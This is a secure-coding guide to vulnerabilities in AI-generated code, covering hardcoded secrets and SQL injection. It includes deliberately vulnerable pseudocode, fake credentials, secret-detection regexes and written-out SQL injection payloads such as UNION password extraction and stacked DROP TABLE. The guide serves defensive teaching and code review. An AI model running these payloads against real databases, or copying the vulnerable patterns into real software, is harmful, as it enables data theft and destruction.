[AI Code Security Deep Dive] A Security Guide to Critical Vulnerabilities in AI-Generated Code

2026-02-07 06:49:18

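Purpose

This document analyzes in depth the 7 most common and most critical security vulnerabilities in AI-generated code. Each vulnerability pattern is covered comprehensively, including:

Multiple pseudocode examples showing different manifestations
Detailed attack scenarios and exploitation techniques
Edge cases that are often overlooked
A thorough explanation of why AI models produce these vulnerabilities
Complete mitigation strategies with their trade-offs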

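Why Depth?

These 7 patterns were selected with a weighted priority scoring system (see [[Ranking-Matrix]]) based on the following factors:

Factor	Weight	Description
Frequency	2x	How often AI produces this vulnerability
Severity	2x	The impact if exploited (remote code execution, data breach, etc.)
Detectability	1x	How easily it is missed during code review

The selected patterns account for the vast majority of security incidents in AI-generated code. Research shows:

86% of AI-generated code fails to defend against XSS (Veracode 2025)
75.8% of developers believe AI-generated authentication code is secure (Snyk survey)
AI code is 2.74 times more likely than human-written code to contain XSS vulnerabilities (CodeRabbit)
Package hallucination rates range from 5.2% to 21.7% across models (USENIX study)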

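Format

All code examples in this document are pseudocode, intended to illustrate security patterns across languages. When implementing:

Adapt these patterns to the idioms and security libraries of your target language.
Follow the established secure coding guidelines for your language.
Use framework-provided security features wherever possible.

The examples use generic syntax that maps to common patterns in Python, JavaScript, Java, Go, and other languages.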

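How to Use This Document

For developers:

Study it before starting work on security-critical applications.
Include it in the AI assistant's context when generating code that handles user input, authentication, or sensitive data.
Use the checklist at the end of each section during code review.

For security engineers:

Use it as training material for development teams.
Use it as a reference when auditing AI-generated code.
Extract patterns for automated detection rules.

For AI/LLM context:

Include this document in the system prompt or context when security is critical.
The detailed examples help AI models understand what not to generate.
The edge case sections help the AI recognize subtle variations of each vulnerability.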

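Instructions for AI/LLM

This document covers the most critical security anti-patterns in depth. Each section contains multiple examples, edge cases, and detailed explanations. All code is pseudocode; implement it using the secure patterns of your target language. Pay special attention to the "Common Mistakes" and "Edge Cases" subsections. These patterns are the root cause of most security vulnerabilities in AI-generated code.

When generating code, you must:

Never use string concatenation in SQL queries, shell commands, or HTML output.
Never embed secrets, API keys, or credentials in source code.
Always validate and sanitize all user input on the server side.
Use parameterized queries, established authentication libraries, and context-aware encoding.
Verify that packages actually exist before recommending them.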

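Top 7 Priority Patterns

This document covers the following patterns in detail:

Rank	Pattern	Priority Score	Primary Risk
1	Hardcoded secrets and credential management	23	Immediate credential theft and exploitation
2	SQL injection and command injection	22/21	Full database access, arbitrary code execution
3	Cross-site scripting (XSS)	23	Session hijacking, account takeover
4	Authentication and session security	22	Complete authentication bypass
5	Cryptographic failures	18-20	Data decryption, credential exposure
6	Input validation and data sanitization	21	Root cause of all injection attacks
7	Dependency risks (slopsquatting)	24	Supply chain compromise, malware execution

Priority scores are calculated as: (Frequency x 2) + (Severity x 2) + Detectability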

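Pattern 1: Hardcoded Secrets and Credential Management

CWE references: CWE-798 (Use of Hard-coded Credentials), CWE-259 (Use of Hard-coded Password), CWE-321 (Use of Hard-coded Cryptographic Key)

Priority score: 23 (Frequency: 9, Severity: 8, Detectability: 6)

Introduction: Why AI Struggles with This in Particular

Hardcoded secrets are among the most widespread and dangerous vulnerabilities in AI-generated code. The root of the problem lies in the training data itself:

Why AI models generate hardcoded secrets:

Training data contains examples: tutorials, documentation, Stack Overflow answers, and even some GitHub repositories include placeholder credentials, API keys, and connection strings. AI models learn these patterns as "normal" code.
Copy-paste culture in training data: developers who share snippets online often include credentials for completeness. The AI learns that "complete" code includes connection strings with embedded passwords.
Documentation examples confused with production code: the training data does not clearly distinguish documentation examples (which may show the bad pattern API_KEY = "your-api-key-here") from production patterns. Models treat both as valid approaches.
Context window limitations: the AI cannot see your .env file or secrets manager configuration when it generates code. It produces self-contained code that "just runs", which usually means hardcoded values.
Helpfulness bias: AI models tend to provide complete, runnable code. When a user asks to "connect to my database", the model generates a full connection string rather than a partial template that needs configuration.

Impact statistics:

More than 6 million secrets were detected on GitHub in 2023 (GitGuardian State of Secrets Sprawl 2024)
Average time to discover a leaked secret: 327 days
Cost of credential-based breaches: $4.45 million on average (IBM Cost of a Data Breach Report 2023)
83% of AI-generated code samples contain at least one hardcoded credential pattern (internal security research)

Bad Examples: Different Manifestations

Bad Example 1: API Keys in Source Files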

// VULNERABLE: API key hardcoded directly in source
class PaymentService:
    API_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"
    API_SECRET = "whsec_5f8d7e3a2b1c4f9e8a7d6c5b4e3f2a1d"

    function processPayment(amount, currency, cardToken):
        headers = {
            "Authorization": "Bearer " + this.API_KEY,
            "Content-Type": "application/json"
        }

        payload = {
            "amount": amount,
            "currency": currency,
            "source": cardToken,
            "api_key": this.API_KEY  // Also exposed in request body
        }

        return httpPost("https://api.payment.com/charges", payload, headers)

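Why this is dangerous:

The API key is committed to version control.
Anyone with access to the repository (including forks) can steal the key.
Even if it is "deleted" later, the key remains in Git history.
The live/production prefix (sk_live_) indicates a real credential.
The webhook secret (whsec_) lets attackers forge webhook events.

Bad Example 2: Database Connection Strings with Passwords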

// VULNERABLE: Full connection string with credentials
DATABASE_URL = "postgresql://admin:SuperSecret123!@prod-db.company.com:5432/production"

// Alternative bad patterns:
DB_CONFIG = {
    "host": "10.0.1.50",
    "port": 5432,
    "database": "customers",
    "user": "app_service",
    "password": "Tr0ub4dor&3"  // Password in config object
}

// Connection string builder - still vulnerable
function getConnection():
    return createConnection(
        host = "database.internal",
        user = "root",
        password = "admin123",  // Hardcoded in function
        database = "app_data"
    )

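Why this is dangerous:

Internal hostnames reveal network architecture.
The credentials grant direct database access.
Port numbers enable targeted scanning.
Password complexity is irrelevant if the password is hardcoded.
Connection pooling code often logs these strings.

Bad Example 3: JWT Secrets in Configuration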

// VULNERABLE: JWT secret as a constant
JWT_CONFIG = {
    "secret": "my-super-secret-jwt-key-that-should-never-be-shared",
    "algorithm": "HS256",
    "expiresIn": "24h"
}

function generateToken(userId, role):
    payload = {
        "sub": userId,
        "role": role,
        "iat": currentTimestamp()
    }
    return jwt.sign(payload, JWT_CONFIG.secret, JWT_CONFIG.algorithm)

function verifyToken(token):
    return jwt.verify(token, JWT_CONFIG.secret)  // Same hardcoded secret

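Why this is dangerous:

Anyone who knows the secret can forge valid tokens.
Admin tokens can be created for any user.
JWT secrets in code are often short, weak strings.
Attackers can impersonate any user in the system.
The secret cannot be rotated without redeploying every service.

Bad Example 4: OAuth Client Secrets in Frontend Code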

// VULNERABLE: OAuth credentials in client-side code
const OAUTH_CONFIG = {
    clientId: "1234567890-abcdef.apps.googleusercontent.com",
    clientSecret: "GOCSPX-1234567890AbCdEf",  // NEVER in frontend!
    redirectUri: "https://myapp.com/callback",
    scopes: ["email", "profile", "calendar.readonly"]
}

function initiateOAuthFlow():
    // Client secret visible in browser dev tools
    authUrl = buildUrl("https://accounts.google.com/o/oauth2/auth", {
        "client_id": OAUTH_CONFIG.clientId,
        "client_secret": OAUTH_CONFIG.clientSecret,  // Exposed!
        "redirect_uri": OAUTH_CONFIG.redirectUri,
        "scope": OAUTH_CONFIG.scopes.join(" "),
        "response_type": "code"
    })
    redirect(authUrl)

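Why this is dangerous:

All users can view frontend code through browser developer tools.
The client secret lets attackers impersonate your application.
Attackers can exchange authorization codes for tokens as your application.
It violates the OAuth 2.0 specification (confidential vs. public clients).
Google and other providers may revoke your credentials.

Bad Example 5: Private Keys Embedded in Code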

// VULNERABLE: Private key as a string constant
RSA_PRIVATE_KEY = """
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA2Z3qX2BTLS4e0rVV5BQKTI8qME4MgJFCMU6L6eRoLJGjvJHB
bRp3aNvFUMbJ0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
-----END RSA PRIVATE KEY-----
"""

function signDocument(document):
    signature = crypto.sign(document, RSA_PRIVATE_KEY, "SHA256")
    return signature

function decryptMessage(encryptedData):
    return crypto.decrypt(encryptedData, RSA_PRIVATE_KEY)

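Why this is dangerous:

Private keys must stay private; embedding one in code violates a basic principle of cryptography.
Anyone with the key can decrypt all encrypted data.
Attackers can sign malicious documents that appear legitimate.
It often enables impersonation of the server or service.
The key pair cannot be rotated safely without a code change.

Good Examples: Correct Patterns

Good Example 1: Using Environment Variables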

// SECURE: Load credentials from environment
class PaymentService:
    function __init__():
        this.apiKey = getEnvironmentVariable("PAYMENT_API_KEY")
        this.apiSecret = getEnvironmentVariable("PAYMENT_API_SECRET")

        // Fail fast if credentials missing
        if this.apiKey is null or this.apiSecret is null:
            throw ConfigurationError("Payment credentials not configured")

    function processPayment(amount, currency, cardToken):
        headers = {
            "Authorization": "Bearer " + this.apiKey,
            "Content-Type": "application/json"
        }

        payload = {
            "amount": amount,
            "currency": currency,
            "source": cardToken
            // No API key in payload
        }

        return httpPost("https://api.payment.com/charges", payload, headers)

// Usage in application startup
// Environment variables set externally (shell, container, deployment)
// $ export PAYMENT_API_KEY="sk_live_..."
// $ export PAYMENT_API_SECRET="whsec_..."

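Why this is secure:

Credentials never appear in source code.
Environment variables are set at runtime by the deployment system.
Different environments (development/test/production) use different credentials.
Credentials can be rotated without code changes.
Failing fast prevents the application from running with missing configuration.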
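
As one possible concrete form of the pseudocode above, here is a minimal Python sketch of the fail-fast environment lookup. The helper name require_env, the ConfigurationError class, and the auth_headers method are illustrative assumptions; the variable names PAYMENT_API_KEY and PAYMENT_API_SECRET are taken from the pseudocode.

```python
import os


class ConfigurationError(RuntimeError):
    """Raised when a required setting is missing from the environment."""


def require_env(name: str) -> str:
    """Return the value of an environment variable, or fail fast."""
    value = os.environ.get(name)
    if not value:  # an unset variable and an empty string are both rejected
        raise ConfigurationError(f"{name} environment variable is required")
    return value


class PaymentService:
    def __init__(self) -> None:
        # Credentials are read at startup; nothing is stored in source code.
        self.api_key = require_env("PAYMENT_API_KEY")
        self.api_secret = require_env("PAYMENT_API_SECRET")

    def auth_headers(self) -> dict[str, str]:
        # The key travels in a header only, never in the request body.
        return {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json",
        }
```

Rejecting empty strings as well as unset variables is a design choice here: a deployment that exports the variable with no value is usually misconfigured rather than intentional.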

Good Example 2: Secrets Management Service (Vault Pattern)

// SECURE: Retrieve secrets from dedicated secrets manager
class SecretManager:
    function __init__(vaultUrl, roleId, secretId):
        // Even vault credentials can come from environment
        this.vaultUrl = vaultUrl or getEnvironmentVariable("VAULT_URL")
        this.roleId = roleId or getEnvironmentVariable("VAULT_ROLE_ID")
        this.secretId = secretId or getEnvironmentVariable("VAULT_SECRET_ID")
        this.token = null
        this.tokenExpiry = null

    function authenticate():
        response = httpPost(this.vaultUrl + "/v1/auth/approle/login", {
            "role_id": this.roleId,
            "secret_id": this.secretId
        })
        this.token = response.auth.client_token
        this.tokenExpiry = currentTime() + response.auth.lease_duration

    function getSecret(path):
        if this.token is null or currentTime() > this.tokenExpiry:
            this.authenticate()

        response = httpGet(
            this.vaultUrl + "/v1/secret/data/" + path,
            headers = {"X-Vault-Token": this.token}
        )
        return response.data.data

// Usage
secretManager = new SecretManager()
dbPassword = secretManager.getSecret("database/production").password
apiKey = secretManager.getSecret("payment/stripe").api_key

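Why this is secure:

Secrets are stored in a purpose-built, hardened secrets manager.
Access is controlled by policy (who can read what).
Automatic secret rotation is supported.
All secret access is audit logged.
Dynamic secrets are supported (for example, temporary database credentials).
Secrets are never written to disk or logs.

Good Example 3: Runtime Configuration Injection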

// SECURE: Dependency injection of configuration
interface IConfig:
    function getDatabaseUrl(): string
    function getApiKey(): string
    function getJwtSecret(): string

class EnvironmentConfig implements IConfig:
    function getDatabaseUrl():
        return getEnvironmentVariable("DATABASE_URL")

    function getApiKey():
        return getEnvironmentVariable("API_KEY")

    function getJwtSecret():
        return getEnvironmentVariable("JWT_SECRET")

class VaultConfig implements IConfig:
    secretManager: SecretManager

    function getDatabaseUrl():
        return this.secretManager.getSecret("db/url").value

    function getApiKey():
        return this.secretManager.getSecret("api/key").value

    function getJwtSecret():
        return this.secretManager.getSecret("jwt/secret").value

// Application uses interface - doesn't know where secrets come from
class Application:
    config: IConfig

    function __init__(config: IConfig):
        this.config = config

    function connectDatabase():
        return createConnection(this.config.getDatabaseUrl())

// Bootstrap based on environment
if getEnvironmentVariable("USE_VAULT") == "true":
    config = new VaultConfig(new SecretManager())
else:
    config = new EnvironmentConfig()

app = new Application(config)

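Why this is secure:

Application code never knows the actual secret values at compile time.
The secret source can be swapped easily (environment variables in development, a vault in production).
Testable: a mock configuration can be injected in tests.
Single responsibility: configuration management is separated from business logic.
Supports gradual migration to more secure secret storage.

Good Example 4: Secure Credential Storage Patterns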

// SECURE: Platform-specific secure credential storage

// For server applications - use instance metadata
class CloudCredentialProvider:
    function getDatabaseCredentials():
        // AWS: Use IAM database authentication
        token = awsRdsGenerateAuthToken(
            hostname = getEnvironmentVariable("DB_HOST"),
            port = 5432,
            username = getEnvironmentVariable("DB_USER")
            // No password - uses IAM role attached to instance
        )
        return {"username": getEnvironmentVariable("DB_USER"), "token": token}

    function getApiCredentials():
        // Retrieve from AWS Secrets Manager
        response = awsSecretsManager.getSecretValue(
            SecretId = getEnvironmentVariable("API_SECRET_ARN")
        )
        return parseJson(response.SecretString)

// For CLI/desktop applications - use OS keychain
class DesktopCredentialProvider:
    function storeCredential(service, account, credential):
        // Uses OS keychain (Keychain on macOS, Credential Manager on Windows)
        keychain.setPassword(service, account, credential)

    function getCredential(service, account):
        return keychain.getPassword(service, account)

// Usage
cloudProvider = new CloudCredentialProvider()
dbCreds = cloudProvider.getDatabaseCredentials()
connection = createConnection(
    host = getEnvironmentVariable("DB_HOST"),
    user = dbCreds.username,
    authToken = dbCreds.token,  // Short-lived token, not password
    sslMode = "verify-full"
)

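Why this is secure:

Uses the cloud provider's identity and access management.
No long-lived passwords; temporary tokens are used instead.
The platform rotates credentials automatically.
The OS keychain provides encrypted, access-controlled storage.
Audit trails are available in cloud provider logs.

Edge Cases

Edge Case 1: Test Credentials Leaking into Production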

// DANGEROUS: Test credentials that can slip into production

// In test file - seems safe
TEST_API_KEY = "sk_test_4242424242424242"
TEST_DB_PASSWORD = "testpassword123"

// But then someone copies test code to production helper:
function quickTest():
    // "Temporary" - but stays forever
    client = createClient(apiKey = "sk_test_4242424242424242")
    return client.ping()

// Or conditionals that fail:
function getApiKey():
    if isProduction():
        return getEnvironmentVariable("API_KEY")
    else:
        return "sk_test_4242424242424242"  // What if isProduction() has a bug?

// SECURE ALTERNATIVE: Use environment variables even for tests
function getApiKey():
    key = getEnvironmentVariable("API_KEY")
    if key is null:
        throw ConfigurationError("API_KEY environment variable required")
    return key

Detection: search the codebase for _test_, _dev_, test123, password123, example, and placeholder.

Edge Case 2: CI/CD Pipeline Secret Leaks

// DANGEROUS: Secrets in CI/CD configuration files

// .github/workflows/deploy.yml (WRONG)
env:
    AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
    AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

// docker-compose.yml committed to repo (WRONG)
services:
    db:
        environment:
            POSTGRES_PASSWORD: mysecretpassword

// SECURE: Use CI/CD platform's secrets management
// .github/workflows/deploy.yml (CORRECT)
env:
    AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
    AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}

// docker-compose.yml (CORRECT)
services:
    db:
        environment:
            POSTGRES_PASSWORD: ${POSTGRES_PASSWORD}  // From environment

Detection: audit CI/CD configuration files, Docker Compose files, and Kubernetes manifests for hardcoded credentials.

Edge Case 3: Docker/Container Secret Handling

// DANGEROUS: Secrets in Dockerfile or image layers

// Dockerfile (WRONG - secrets baked into image)
FROM node:18
ENV API_KEY=sk_live_xxxxxxxxxxxxx
RUN echo "password123" > /app/.pgpass
COPY config-with-secrets.json /app/config.json

// Even if you delete later, it's in a layer:
RUN rm /app/.pgpass  // Still recoverable from image layers!

// SECURE: Use build secrets or runtime injection
// Dockerfile (CORRECT)
FROM node:18
# No secrets in build context

// docker-compose.yml with runtime secrets
services:
    app:
        environment:
            API_KEY: ${API_KEY}  // From host environment
        secrets:
            - db_password
secrets:
    db_password:
        external: true  // From Docker Swarm secrets or similar

// Or use Docker BuildKit secrets for build-time needs
# syntax=docker/dockerfile:1.2
FROM node:18
RUN --mount=type=secret,id=npm_token \
    NPM_TOKEN=$(cat /run/secrets/npm_token) npm install

Detection: use docker history --no-trunc <image> to inspect image layers for secrets.

Edge Case 4: Logging That Accidentally Captures Secrets

// DANGEROUS: Secrets leaked through logging

function connectToDatabase(config):
    logger.info("Connecting with config: " + toJson(config))
    // Logs: {"host": "db.com", "user": "admin", "password": "secret123"}

function makeApiRequest(url, headers, body):
    logger.debug("Request: " + url + " Headers: " + toJson(headers))
    // Logs: Authorization: Bearer sk_live_xxxxx

function handleError(error):
    logger.error("Error: " + error.message + " Stack: " + error.stack)
    // Stack trace might contain secrets from variables

// SECURE: Sanitize before logging
function sanitizeForLogging(obj):
    sensitiveKeys = ["password", "secret", "key", "token", "auth", "credential"]
    result = deepCopy(obj)
    for key in result.keys():
        if any(sensitive in key.lower() for sensitive in sensitiveKeys):
            result[key] = "[REDACTED]"
    return result

function connectToDatabase(config):
    logger.info("Connecting with config: " + toJson(sanitizeForLogging(config)))
    // Logs: {"host": "db.com", "user": "admin", "password": "[REDACTED]"}

// Or use structured logging with secret types
class Secret:
    value: string
    function toString(): return "[SECRET]"
    function toJson(): return "[SECRET]"
    function getValue(): return this.value  // Only accessible explicitly

Detection: search logs for patterns such as password=, token=, key=, bearer tokens, and connection strings.
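
The sanitizeForLogging pseudocode above checks only top-level keys, so a secret nested inside a sub-object or a list would still be logged. The following Python sketch shows one way to redact recursively. The marker list is copied from the pseudocode; the function and constant names are illustrative.

```python
from typing import Any

# Substrings that mark a key as sensitive (same list as the pseudocode above).
SENSITIVE_MARKERS = ("password", "secret", "key", "token", "auth", "credential")


def sanitize_for_logging(value: Any) -> Any:
    """Return a redacted copy of value; the input itself is not modified."""
    if isinstance(value, dict):
        clean = {}
        for name, item in value.items():
            if any(marker in str(name).lower() for marker in SENSITIVE_MARKERS):
                clean[name] = "[REDACTED]"
            else:
                clean[name] = sanitize_for_logging(item)  # descend into nested data
        return clean
    if isinstance(value, (list, tuple)):
        return [sanitize_for_logging(item) for item in value]
    return value
```

Substring matching is deliberately broad: a harmless key such as "author" is also redacted because it contains "auth". Over-redacting is usually the safer failure mode for logs.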

Common Mistakes

Mistake 1: .env File Committed to Git

// project/.env (NEVER COMMIT THIS)
DATABASE_URL=postgresql://user:password@localhost/db
API_KEY=sk_live_xxxxxxxxxx
JWT_SECRET=my-secret-key

// .gitignore (MUST INCLUDE)
.env
.env.local
.env.*.local
*.pem
*.key
credentials.json
secrets.yaml

// CORRECT: Commit a template instead
// project/.env.example (SAFE TO COMMIT)
DATABASE_URL=postgresql://user:password@localhost/db
API_KEY=your_api_key_here
JWT_SECRET=generate_a_secure_random_string

// Add pre-commit hook to prevent accidental commits
// .git/hooks/pre-commit
#!/bin/bash
if git diff --cached --name-only | grep -E '\.env$|credentials|secrets'; then
    echo "ERROR: Attempting to commit potential secrets file"
    exit 1
fi

Detection: check Git history: git log --all --full-history -- "*.env" "*credentials*" "*secrets*"

Mistake 2: Secrets in Error Messages

// DANGEROUS: Secrets exposed in error handling

function connectToPaymentApi():
    try:
        apiKey = getApiKey()
        response = httpPost(
            "https://api.payment.com/connect",
            headers = {"Authorization": "Bearer " + apiKey}
        )
    catch error:
        // Exposes API key in error log and potentially to users
        throw new Error("Failed to connect with key: " + apiKey + ". Error: " + error)

// SECURE: Never include secrets in error messages
function connectToPaymentApi():
    try:
        apiKey = getApiKey()
        response = httpPost(
            "https://api.payment.com/connect",
            headers = {"Authorization": "Bearer " + apiKey}
        )
    catch error:
        // Log correlation ID, not secrets
        correlationId = generateUUID()
        logger.error("Payment API connection failed", {
            "correlationId": correlationId,
            "errorCode": error.code,
            "endpoint": "api.payment.com"
            // No API key!
        })
        throw new Error("Payment service unavailable. Reference: " + correlationId)

Mistake 3: Secrets in URLs (Query Parameters)

// DANGEROUS: Secrets in URL query parameters

function makeAuthenticatedRequest(endpoint, apiKey):
    // API keys in URLs are logged everywhere:
    // - Browser history
    // - Server access logs
    // - Proxy logs
    // - Referrer headers
    url = "https://api.service.com" + endpoint + "?api_key=" + apiKey
    return httpGet(url)

// Even worse with multiple secrets:
url = "https://api.com/data?key=" + apiKey + "&secret=" + secretKey

// SECURE: Use headers for authentication
function makeAuthenticatedRequest(endpoint, apiKey):
    return httpGet(
        "https://api.service.com" + endpoint,
        headers = {
            "Authorization": "Bearer " + apiKey,
            // Or API-specific header
            "X-API-Key": apiKey
        }
    )

Detection: search for URLs containing ?api_key=, ?token=, ?secret=, or ?password=.
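
A plain text search for ?api_key= misses parameters that are not first in the query string (for example &token=). As a rough sketch, the query string can be parsed instead. The parameter name set below is an assumption and should be extended for the APIs you actually use.

```python
from urllib.parse import parse_qsl, urlsplit

# Hypothetical list of parameter names that usually carry credentials.
SECRET_PARAM_NAMES = {"api_key", "apikey", "key", "token", "secret", "password"}


def secret_query_params(url: str) -> list[str]:
    """Return the names of query parameters that look like credentials."""
    query = urlsplit(url).query
    return [
        name
        for name, _value in parse_qsl(query, keep_blank_values=True)
        if name.lower() in SECRET_PARAM_NAMES
    ]
```

A check like this could run over logged request URLs or over string literals extracted from source code; any non-empty result is a candidate for moving the value into a request header.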

Detection Tips: How to Spot This Pattern in Code Review

Automated Detection Patterns

// High-confidence patterns to search for:

// 1. Direct assignment to suspicious variable names
regex: /(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']/i

// 2. Common API key formats
regex: /(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)/

// 3. Private key markers
regex: /-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/

// 4. Connection strings with passwords
regex: /(mysql|postgresql|mongodb|redis):\/\/[^:]+:[^@]+@/

// 5. Base64 encoded secrets (often JWT secrets)
regex: /["'][A-Za-z0-9+\/=]{40,}["']/
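
As an illustration of how these patterns might be wired into a script, here is a small Python scanner built from patterns 1 to 4 above. Pattern 5 is left out of this sketch because long Base64-looking strings tend to produce many false positives. The label strings and the scan_text function are illustrative and do not correspond to any particular tool.

```python
import re

# Regexes adapted from patterns 1-4 above; labels are illustrative.
SECRET_PATTERNS = {
    "suspicious assignment": re.compile(
        r"""(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']""",
        re.IGNORECASE,
    ),
    "known key prefix": re.compile(
        r"(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)"
    ),
    "private key marker": re.compile(
        r"-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"
    ),
    "connection string with password": re.compile(
        r"(mysql|postgresql|mongodb|redis)://[^:]+:[^@]+@"
    ),
}


def scan_text(text: str) -> list[tuple[int, str]]:
    """Return (line number, label) pairs for every pattern that matches a line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, label))
    return findings
```

A scanner like this is only a first pass. The dedicated tools listed later in this section also handle Git history and entropy checks, which a handful of regexes cannot.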

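Manual Code Review Checklist

Check	What to look for
Constants	Any string constant in authentication/configuration code
Configuration objects	Credential fields containing non-placeholder values
Connection code	Database connections and API clients with inline credentials
Test files	Test credentials that may be real, or may become real later
CI/CD	Pipeline configuration, Dockerfiles, deployment scripts
Comments	"TODO: move to env" comments that contain actual secrets

Detection Tools

git-secrets - prevents secrets from being committed to Git
truffleHog - scans Git history for secrets
GitGuardian - SaaS secret detection
gitleaks - SAST tool for detecting secrets
detect-secrets - Yelp's secret detection tool

Security Checklist

No credentials, API keys, or secrets in source code.
No secrets in configuration files committed to version control.
.gitignore includes all secret file patterns (.env, *.pem, and so on).
Pre-commit hooks prevent accidental secret commits.
Environment variables or a secrets manager are used for all credentials.
No secrets in CI/CD configuration files (use platform secrets).
No secrets in Docker images or Dockerfiles.
Logging redacts sensitive fields.
Error messages never contain secrets.
No secrets in URL query parameters.
Test credentials are obviously fake and cannot work in production.
Secret scanning is enabled in repository settings.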

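Pattern 2: SQL Injection and Command Injection

CWE references: CWE-89 (SQL Injection), CWE-77 (Command Injection), CWE-78 (OS Command Injection)

Priority score: 22/21 (SQL: Frequency 10, Severity 10, Detectability 4; Command: Frequency 8, Severity 10, Detectability 6)

Introduction: Why This Is Still Widespread in AI-Generated Code

SQL injection and command injection are among the oldest vulnerability classes, yet they still plague AI-generated code at an alarming rate. Despite decades of secure coding education and well-established mitigations, AI models continue to generate vulnerable code.

Why AI models produce injection vulnerabilities:

Training data contamination: research shows that string-concatenated queries appear "thousands of times" in AI training data from GitHub repositories. In historical codebases, this vulnerable pattern is statistically more common than the secure one.
Simplicity bias: string concatenation is syntactically simpler than parameterized queries. AI models aim to produce "working code", and concatenation requires fewer tokens and concepts.
Lack of adversarial awareness: AI models do not inherently consider that user input may be malicious. Asked to "query a user by ID", the model focuses on the functional requirement, not the security implications.
Prevalence of tutorial code: many tutorials and documentation examples show vulnerable patterns for brevity. The AI learns that f"SELECT * FROM users WHERE id = {id}" is a valid pattern.
Context limitations: the AI has no view of your full application architecture, threat model, or data flow. It does not know which inputs come from untrusted sources.

Impact statistics:

SQL injection (CWE-89): ranked #2 in the 2025 CWE Top 25 Most Dangerous Software Weaknesses
Command injection (CWE-78): ranked #9 in the 2025 CWE Top 25
20% SQL injection failure rate on AI-generated tasks (Veracode 2025)
8 directly concatenated queries found in a single test session (Invicti Security)
CVE-2025-53773: a real-world command injection vulnerability in GitHub Copilot

SQL Injection: Multiple Bad Examples

Bad Example 1: String Concatenation in SELECT Statements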

// VULNERABLE: Direct string concatenation
function getUserById(userId):
    query = "SELECT * FROM users WHERE id = " + userId
    return database.execute(query)

// Even worse with f-string/template literal
function getUserByEmail(email):
    query = f"SELECT * FROM users WHERE email = '{email}'"
    return database.execute(query)

// Attack: email = "' OR '1'='1' --"
// Result: SELECT * FROM users WHERE email = '' OR '1'='1' --'
// Returns ALL users in the database

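Why this is dangerous:

The attacker controls the query structure, not just the values.
The entire database contents can be extracted.
Authentication can be bypassed with the ' OR '1'='1 pattern.
Comments (--, #, /**/) can truncate the rest of the query.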
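
To make the attack concrete, the following sketch reproduces it against an in-memory SQLite database using Python's standard sqlite3 module. The table contents and function names are made up for the demonstration; the payload is the one from the pseudocode above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
conn.executemany(
    "INSERT INTO users (email) VALUES (?)",
    [("alice@example.com",), ("bob@example.com",)],
)


def get_user_by_email_vulnerable(email: str) -> list[tuple]:
    # VULNERABLE: the input becomes part of the SQL text itself.
    query = f"SELECT id, email FROM users WHERE email = '{email}'"
    return conn.execute(query).fetchall()


def get_user_by_email_safe(email: str) -> list[tuple]:
    # SECURE: the input is bound as a value and never parsed as SQL.
    return conn.execute(
        "SELECT id, email FROM users WHERE email = ?", (email,)
    ).fetchall()


payload = "' OR '1'='1' --"
leaked = get_user_by_email_vulnerable(payload)  # every row in the table
nothing = get_user_by_email_safe(payload)       # no user has this literal email
```

With the vulnerable function the payload rewrites the WHERE clause and both rows come back. With the parameterized function the same string is compared literally against the email column and matches nothing.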

Bad Example 2: Dynamic Table/Column Names

// VULNERABLE: User-controlled table name
function getDataFromTable(tableName, id):
    query = f"SELECT * FROM {tableName} WHERE id = {id}"
    return database.execute(query)

// Attack: tableName = "users; DROP TABLE users; --"
// Result: SELECT * FROM users; DROP TABLE users; -- WHERE id = 1

// VULNERABLE: User-controlled column names
function sortUsers(sortColumn, sortOrder):
    query = f"SELECT * FROM users ORDER BY {sortColumn} {sortOrder}"
    return database.execute(query)

// Attack: sortColumn = "(SELECT password FROM users WHERE is_admin=1)"
// Result: Data exfiltration through error messages or timing

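Why this is dangerous:

Parameterized queries cannot protect table or column names.
Enables schema manipulation attacks.
Arbitrary SQL statements can be executed through stacking.
Attackers can extract data through subquery injection.

Bad Example 3: ORDER BY Injection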

// VULNERABLE: ORDER BY with user input
function getProductList(category, sortBy):
    query = f"SELECT * FROM products WHERE category = ? ORDER BY {sortBy}"
    return database.execute(query, [category])

// Attack: sortBy = "price, (CASE WHEN (SELECT password FROM users LIMIT 1)
//                  LIKE 'a%' THEN price ELSE name END)"
// Result: Boolean-based blind SQL injection

// Attack: sortBy = "IF(1=1, price, name)"
// Result: Confirms SQL injection is possible

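Why this is dangerous:

Developers often parameterize the WHERE clause but forget about ORDER BY.
ORDER BY cannot use standard parameterization.
Conditional sorting enables blind SQL injection.
Invalid column references enable error-based extraction.

Bad Example 4: LIKE Clause Injection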

// VULNERABLE: Unescaped LIKE pattern
function searchProducts(searchTerm):
    query = f"SELECT * FROM products WHERE name LIKE '%{searchTerm}%'"
    return database.execute(query)

// Attack: searchTerm = "%' UNION SELECT username, password, null FROM users --"
// Result: UNION-based data extraction

// Even "safer" version has issues:
function searchProductsSafe(searchTerm):
    query = "SELECT * FROM products WHERE name LIKE ?"
    return database.execute(query, [f"%{searchTerm}%"])

// Attack: searchTerm = "%" (matches everything - DoS through performance)
// Attack: searchTerm = "_" repeated (wildcard matching - info disclosure)

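Why this is dangerous:

LIKE patterns need two layers of escaping (SQL plus LIKE wildcards).
% and _ pass through parameterization safely as values but still act as wildcards inside LIKE.
Expensive wildcard patterns enable performance-based denial of service.
LIKE behavior can be used to probe whether data exists.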
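
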